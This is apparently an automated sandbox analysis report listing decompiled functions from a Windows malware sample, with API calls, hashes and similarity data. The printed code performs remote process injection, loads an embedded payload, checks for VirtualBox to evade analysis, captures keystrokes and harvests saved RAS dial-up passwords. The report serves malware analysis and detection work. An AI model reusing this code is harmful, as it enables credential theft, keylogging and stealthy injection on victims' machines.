                                    0x0040af4a
                                    0x0040af5e
                                    0x0040af62
                                    0x0040af74
                                    0x0040af7d
                                    0x0040af95
                                    0x0040af9b
                                    0x0040afa0
                                    0x0040afa0
                                    0x0040af7d
                                    0x0040afaf

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404460, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				void* _t8;
				struct HRSRC__* _t15;
				void* _t16;
				long _t22;
				void* _t24;

				_t24 = __eax;
				_t2 =  *0x40e670; // 0x400000
				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
				_t4 =  *0x40e670; // 0x400000
				_t22 = SizeofResource(_t4, _t15);
				_t6 =  *0x40e670; // 0x400000
				_t16 = LoadResource(_t6, _t15);
				_t8 = LockResource(_t16);
				_t23 = _t8;
				if(_t8 != 0) {
					E00402074(_t24, _t22 - 1);
					E00403730(E00401F9C(_t24), _t23);
					return FreeResource(_t16);
				}
				return _t8;
			}











                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004051CC, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E004051CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v264;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				void* _t35;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				void* _t58;
				void* _t61;

				_t56 = __edi;
				_v304 = 0;
				_v312 = 0;
				_v316 = 0;
				_v308 = 0;
				_push(_t61);
				_push(0x4052c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xfffffec8;
				_t58 = E0040508C(2, 0);
				_v300 = 0x128;
				while(E004050CC(_t58,  &_v300) != 0) {
					E00401D24( &_v308, 0x104,  &_v264);
					E00404740(_v308, 0,  &_v304, _t56, _t58, __eflags);
					_push(_v304);
					E00404740("VBoxService.exe", 0,  &_v316, _t56, _t58, __eflags);
					E00401CAC( &_v312, E00401F48(_v316));
					_pop(_t53);
					_t35 = E0040202C(_v312, _t53);
					__eflags = _t35;
					if(_t35 <= 0) {
						continue;
					} else {
						CloseHandle(_t58);
					}
					L5:
					_pop(_t54);
					 *[fs:eax] = _t54;
					_push(E004052CB);
					return E00401AE4( &_v316, 4);
				}
				CloseHandle(_t58);
				goto L5;
			}















                                    0x004051cc
                                    0x004051d9
                                    0x004051df
                                    0x004051e5
                                    0x004051eb
                                    0x004051f3
                                    0x004051f4
                                    0x004051f9
                                    0x004051fc
                                    0x0040520d
                                    0x0040520f
                                    0x0040528b
                                    0x0040522c
                                    0x0040523d
                                    0x00405248
                                    0x00405254
                                    0x0040526c
                                    0x00405277
                                    0x00405278
                                    0x0040527d
                                    0x0040527f
                                    0x00000000
                                    0x00405281
                                    0x00405282
                                    0x00405287
                                    0x004052a6
                                    0x004052a8
                                    0x004052ab
                                    0x004052ae
                                    0x004052c3
                                    0x004052c3
                                    0x004052a1
                                    0x00000000

                                    APIs
                                    • CloseHandle.KERNEL32(00000000), ref: 00405282
                                    • CloseHandle.KERNEL32(00000000), ref: 004052A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: VBoxService.exe
                                    • API String ID: 2962429428-2802435167
                                    • Opcode ID: dfea2f74cef867659bb920515f5cb2bbaa2be718a1e003b5bf27e31b616b6916
                                    • Instruction ID: ff1f50b1f712d9e83e418e106ccd5f3ee627a2592b30da2e2b1bb43fe4630877
                                    • Opcode Fuzzy Hash: dfea2f74cef867659bb920515f5cb2bbaa2be718a1e003b5bf27e31b616b6916
                                    • Instruction Fuzzy Hash: 4D214F30A016188FD761EB25CC416DE76B5EF49314F5040FAF508F3281DB389F818E98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AEBC, Relevance: 4.5, APIs: 3, Instructions: 41memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040AEBC(void* __eax, long __ecx, void* __edx) {
				long _v20;
				void* _t8;
				long _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				SIZE_T* _t17;

				_t17 = _t16 + 0xfffffff8;
				_t13 = __ecx;
				_t15 = __edx;
				_t14 = __eax;
				_t8 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40);
				VirtualProtectEx(_t14, _t8, _t13, 0x40,  &_v20);
				if(_t8 != 0 && WriteProcessMemory(_t14, _t8, _t15, _t13, _t17) == 0) {
					_t8 = 0;
				}
				return _t8;
			}










                                    0x0040aec0
                                    0x0040aec3
                                    0x0040aec5
                                    0x0040aec7
                                    0x0040aed9
                                    0x0040aee5
                                    0x0040aeec
                                    0x0040aefc
                                    0x0040aefc
                                    0x0040af06

                                    APIs
                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                    • VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                    • String ID:
                                    • API String ID: 4073123320-0
                                    • Opcode ID: f493a3abc642431a14bc55cc0decca4829c7a62d1701b1cc0c8d474c002842f3
                                    • Instruction ID: 04b6d850f764c93e9d2b28317530c39f193fb0b34fce4645c0d07a737dcea716
                                    • Opcode Fuzzy Hash: f493a3abc642431a14bc55cc0decca4829c7a62d1701b1cc0c8d474c002842f3
                                    • Instruction Fuzzy Hash: 38E030623466543AE23014575C86FAB5A8CCBC6BA5F10013EBB04B62C0E96AAE0551BD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B0B8, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040B0B8(int* __ecx, void* __edx) {
				int* _v8;
				short _v10;
				char _v266;
				int* _t15;

				_v8 = __ecx;
				_t15 = _v8;
				if(__edx == 0x100) {
					GetKeyboardState( &_v266);
					ToAscii( *_t15, _t15[1],  &_v266,  &_v10, 0);
				}
				return 1;
			}







                                    0x0040b0c3
                                    0x0040b0cb
                                    0x0040b0d4
                                    0x0040b0dd
                                    0x0040b0f6
                                    0x0040b0fb
                                    0x0040b104

                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 0040B0DD
                                    • ToAscii.USER32(?,?,?,?,00000000), ref: 0040B0F6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AsciiKeyboardState
                                    • String ID:
                                    • API String ID: 1779786364-0
                                    • Opcode ID: 1a8a745c7c25f85aaab6bcb3023bac942ae0cb84df644b1a1d9648621a4d1486
                                    • Instruction ID: f0005aa7a374a961e5e6f82646fdc64f58cd4f7077afd7099a87c19bc913b3b9
                                    • Opcode Fuzzy Hash: 1a8a745c7c25f85aaab6bcb3023bac942ae0cb84df644b1a1d9648621a4d1486
                                    • Instruction Fuzzy Hash: E2F0C072A00118BFDB10DADDDD81FCBB7AC9B18315F0041B6B908E7281DA759E5057A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004032F5, Relevance: 3.0, APIs: 2, Instructions: 12memorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004032F5(void* __eax, void* __ebx, void* __esi) {
				long _t7;

				 *((intOrPtr*)(__ebx + 0x3e)) =  *((intOrPtr*)(__ebx + 0x3e)) + __esi;
				 *0x40e590 = GetProcessHeap();
				 *0x40e000 = E004029DC;
				 *0x40e02c = 0xd7b0;
				 *0x40e1f8 = 0xd7b0;
				 *0x40e3c4 = 0xd7b0;
				E0040299C();
				_t7 = GetCurrentThreadId();
				 *0x40e01c = _t7;
				return _t7;
			}




                                    0x004032fa
                                    0x00403302
                                    0x00403307
                                    0x00403311
                                    0x0040331a
                                    0x00403323
                                    0x0040332c
                                    0x00403331
                                    0x00403336
                                    0x0040333b

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentHeapProcessThread
                                    • String ID:
                                    • API String ID: 3484890527-0
                                    • Opcode ID: 27b3b6974042531a664cb1fe38eba8a8a9cd419ee23f0ea59df76cef04af70e6
                                    • Instruction ID: 69e3deb0adb312a31fe3813bb06994c51432f8a8989e71ac7a29f5a8f1f4c54e
                                    • Opcode Fuzzy Hash: 27b3b6974042531a664cb1fe38eba8a8a9cd419ee23f0ea59df76cef04af70e6
                                    • Instruction Fuzzy Hash: 1CD017B4810260DAE300EF63AF451087A60BF05308700AD7FE100BA2B2FBB842619B9E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004056DC, Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DAEMON
                                    • API String ID: 0-1922372065
                                    • Opcode ID: b483fd6bf445ce8cac489cd1765a37d26c006e70009b3f4b04475a6d305492bb
                                    • Instruction ID: ff9dd751d756866e208d31830bb566c9fb1a044535b2460e430827fd69309c63
                                    • Opcode Fuzzy Hash: b483fd6bf445ce8cac489cd1765a37d26c006e70009b3f4b04475a6d305492bb
                                    • Instruction Fuzzy Hash: 39E04F31240A44ABDB129B158C12F57B7ECD345B44F1144B1F901F3AD1D279EE10A869
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405684, Relevance: .0, Instructions: 21COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 011f3edd17df6e3a0d3e9760639db1b7d270aba6d112c1f8f5362d8ca4fcb0d0
                                    • Instruction ID: 7f94392c905d70edd5cae979f2db0d97197127d2bd1df01fa9d4973e5e5bf9ed
                                    • Opcode Fuzzy Hash: 011f3edd17df6e3a0d3e9760639db1b7d270aba6d112c1f8f5362d8ca4fcb0d0
                                    • Instruction Fuzzy Hash: ADE02630809A048EEF24CB4595052ABB7F8D742324F5484B6D00C673C0D67B9A94CE08
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405770, Relevance: .0, Instructions: 5COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba6bc1ae00c6916c74ed3910e531681c6c6ecc516f8f8c804ff5c88a679010f2
                                    • Instruction ID: 4236f64593cb35683e782d4f7c4e11c0f3d3bdd44736c68a4ca992c86675be2c
                                    • Opcode Fuzzy Hash: ba6bc1ae00c6916c74ed3910e531681c6c6ecc516f8f8c804ff5c88a679010f2
                                    • Instruction Fuzzy Hash: 13B00279261650CFD791CB08C598F40B7F5FB48B74F8685D5E8498B663C378E914CA04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408238, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 277COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				char _v3024;
				char _v3028;
				char _v3284;
				char _v3288;
				char _v3292;
				char _t130;
				void* _t138;
				CHAR* _t167;
				void* _t181;
				CHAR* _t185;
				CHAR* _t190;
				void* _t199;
				void* _t201;
				int _t215;
				intOrPtr* _t216;
				signed int* _t222;
				void* _t223;
				intOrPtr _t225;
				intOrPtr _t230;
				CHAR* _t253;
				void* _t254;
				signed int _t256;
				void* _t259;

				_t255 = __esi;
				_t252 = __edi;
				_t211 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v3288 = 0;
				_v3292 = 0;
				_v3028 = 0;
				_v3024 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v8 = __eax;
				_push(_t259);
				_push(0x40861b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t259 + 0xfffff328;
				E00401AC0(_v8);
				_v20 = E00407FF0();
				if(_v20 != 0) {
					_push(_v20);
					E00402FBC();
					 *_v24 = 0x108;
					_v12 = 0x108 * _v20;
					_push( &_v20);
					_push( &_v12);
					_t130 = _v24;
					_push(_t130);
					_push(0);
					_push(0);
					L00407B84();
					if(_t130 == 0) {
						_v200.dwOSVersionInfoSize = 0x94;
						GetVersionExA( &_v200);
						E00402074( &_v28, 0x105);
						E00402074( &_v32, 0x105);
						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
							_push(0);
							_push(0x1a);
							_t199 = E00401F9C( &_v28);
							_push(_t199);
							_push(0);
							L00407B7C();
							_t267 = _t199;
							if(_t199 != 0) {
								E00407F4C(_v28,  &_v3024, _t267);
								E00401B58( &_v28, _v3024);
							}
							_push(0);
							_push(0x23);
							_t201 = E00401F9C( &_v32);
							_push(_t201);
							_push(0);
							L00407B7C();
							_t268 = _t201;
							if(_t201 != 0) {
								E00407F4C(_v32,  &_v3028, _t268);
								E00401B58( &_v32, _v3028);
							}
							E00407E40(_t211, 1, _t252, _t255, _t268);
						}
						_v36 = 0xffffffff;
						_t138 = _v20 - 1;
						if(_t138 >= 0) {
							_v52 = _t138 + 1;
							_t256 = 0;
							do {
								_v1252 = 0x41c;
								_t214 = (_t256 << 5) + _t256;
								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
								_push( &_v36);
								_push( &_v1252);
								_push(0);
								L00407B8C();
								_v12 = 0x6e8;
								E00401414( &_v3020, _v12);
								_v3020 = _v12;
								_t222 =  &_v3020;
								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
									if( *_v28 != 0) {
										L15:
										E00401CAC( &_v40,  &_v1248);
										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
										_t167 = E00401F9C( &_v28);
										_t253 = E00401F48(_v40);
										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
										if(_t215 == 0) {
											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
										}
										if(_t215 == 0) {
											_t190 = E00401F9C( &_v28);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
										}
										if(_t215 == 0) {
											_t185 = E00401F9C( &_v32);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
										}
										if(_t215 > 0) {
											E00402BC0( &_v3284, _t215, 0);
											E00401D18( &_v48,  &_v3284, 0);
											_t254 = 0x100;
											_t216 = 0x40e9bc;
											do {
												E00401E94( *_t216, _v48);
												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
													_t87 = _t216 + 4; // 0x0
													_push(E00401D50( *_t87));
													_t88 = _t216 + 4; // 0x0
													_t181 = E00401F48( *_t88);
													_pop(_t223);
													E00408038( &_v476, _t223, _t181);
												}
												_t216 = _t216 + 8;
												_t254 = _t254 - 1;
											} while (_t254 != 0);
										}
									} else {
										_t274 =  *_v32;
										if( *_v32 != 0) {
											goto L15;
										}
									}
								}
								if( &_v733 != 0 &&  &_v476 != 0) {
									_push( *_v8);
									_push("RAS Passwords |");
									E00401CAC( &_v3288,  &_v733);
									_push(_v3288);
									_push(0x40865c);
									E00401CAC( &_v3292,  &_v476);
									_push(_v3292);
									_push(0x40865c);
									_push(0x408668);
									E00401E10();
								}
								_t256 = _t256 + 1;
								_t100 =  &_v52;
								 *_t100 = _v52 - 1;
							} while ( *_t100 != 0);
						}
					}
				}
				_pop(_t225);
				 *[fs:eax] = _t225;
				_push(E00408622);
				E00401AE4( &_v3292, 2);
				E00401AE4( &_v3028, 2);
				E00401AE4( &_v48, 3);
				E00401AE4( &_v32, 2);
				_t230 =  *0x408214; // 0x408218
				return E00402FC8( &_v24, _t230);
			}












































                                    0x00408238
                                    0x00408238
                                    0x00408238
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408295
                                    0x0040829e
                                    0x004082ad
                                    0x004082bd
                                    0x004082c2
                                    0x004082c8
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x00408300
                                    0x0040830d
                                    0x00408319
                                    0x00408324
                                    0x00408326
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x00408345
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408379
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408391
                                    0x0040839b
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b9
                                    0x004083cd
                                    0x004083d5
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083f6
                                    0x004083fe
                                    0x00408415
                                    0x0040841d
                                    0x00408429
                                    0x00408442
                                    0x00408450
                                    0x00408459
                                    0x00408464
                                    0x0040846c
                                    0x00408481
                                    0x00408489
                                    0x0040848d
                                    0x004084a5
                                    0x004084a5
                                    0x004084a9
                                    0x004084ae
                                    0x004084c9
                                    0x004084c9
                                    0x004084cd
                                    0x004084d2
                                    0x004084ed
                                    0x004084ed
                                    0x004084f1
                                    0x004084ff
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x00408521
                                    0x00408526
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x0040853a
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x0040855b
                                    0x0040856a
                                    0x0040856c
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085b6
                                    0x004085b6
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c7
                                    0x004085ca
                                    0x004085cd
                                    0x004085dd
                                    0x004085ed
                                    0x004085fa
                                    0x00408607
                                    0x0040860f
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
